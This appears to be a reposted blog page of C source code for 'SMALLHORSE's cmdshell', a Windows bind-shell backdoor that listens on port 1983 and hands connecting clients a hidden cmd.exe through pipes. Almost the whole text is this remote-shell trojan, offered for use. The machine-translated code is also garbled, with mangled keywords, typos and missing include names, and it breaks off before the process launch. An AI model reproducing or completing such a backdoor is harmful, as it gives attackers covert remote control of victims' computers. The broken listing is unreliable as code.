Simple cmdshell source code

xiaoxiao2021-03-06  21

#include #include #pragma Comment (lib, "ws2_32.lib") int port = 1983; DWORD WINAPI Clientthread (LPVOID LPPAR); void help () {printf ("/ ** ************************** / // n "); Printf (" | | "|" SMALLHORSE's First cmdshell v0.1 | / n "); Printf (" | THANKS for Using it! / N "); Printf (" | | | | | | | | | | | | | | | | | | | | **** ************************* | / N "); Printf (" | | usage: smallhorse [- P port] | / n "); Printf (" | port: port number to listen on | / n "); Printf (" | DEFAULT port IS 1983 | / N "); printf (" // ***** *********************** // n "); return;}

void OpenDoor () {// initialize Winsock WSADATA wsaData;. SOCKET m_socket, AcceptClient; sockaddr_in Service, Client; int ClientSize, i = 0; int iResult = WSAStartup (MAKEWORD (2,2), & wsaData); if (iResult =! NO_ERROR) RETURN;

// Create a socket m_socket = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);. If (m_socket == SOCKET_ERROR) return; Service.sin_family = AF_INET; Service.sin_addr.s_addr = htonl (INADDR_ANY); Service.sin_port = htons (port );

IF (bind (m_socket, (sockaddr *) & service, sizeof (service)) == SOCKET_ERROR) RETURN; / / Bond IF (Listen (M_Socket, 5) == Socket_ERROR) Return; // Maximum Monitor Column 5 Printf "/ NSMALLHORSE LISTEN ON Port:% D ... ^ * ^ / n", port); clientsize = sizeof (client); while (1) {acceptclient = accept (m_socket, (sockaddr *) & client, & clientsize; if (Acceptclient == Socket_ERROR) RETURN; // Accept the connection printf ("Client Connected./N"); char * sendbuf = "/ ********************** ***************** /// n / tthanks for use ... / n / tsmallhorse's cmdshell! / n / tgood luck! / n // ***** ********************************* // n / n "; send (AcceptClient, Sendbuf, Strlen (SendBuf) ), 0); if (Createthread (NULL, 0, ClientthRead, (LPVOID) & AcceptClient, 0, NULL) == NULL) Printf ("Create Thread Error! / N"); SLEEP (1000);} wsacleanup (); return;} DWORD WINAPI ClientThread (LPVOID lpParam) {int ret; char Buf [1024]; HANDLE Rpipe, Wpipe, Wfile, Rfile; SOCKET acceptClient = (SOCKET) * (SOCKET *) lpParam; SECURITY_ATTRIBUTES sa; sa.nLength = sizeof (sa) ; sa.binherithandle = true; sa.lpsecurityDescriptor = null;

RET = CreatePipe (& RPIPE, & RILE, & SA, 0); RET = CREATEPIPE (& WFile, & Wpipe, & Sa, 0); // Establish two pipes, used to receive commands and display results, respectively

STARTUPINFO startinfo; GetStartupInfo (& startinfo); startinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; startinfo.hStdInput = Wfile; startinfo.hStdError = startinfo.hStdOutput = Rfile; startinfo.wShowWindow = SW_HIDE;

Char cmdline [max_path]; getSystemDirectory (cmdline, max_path); strcat (cmdline, ("// cmd.exe"));

转载请注明原文地址:https://www.9cbs.com/read-41238.html

New Post(0)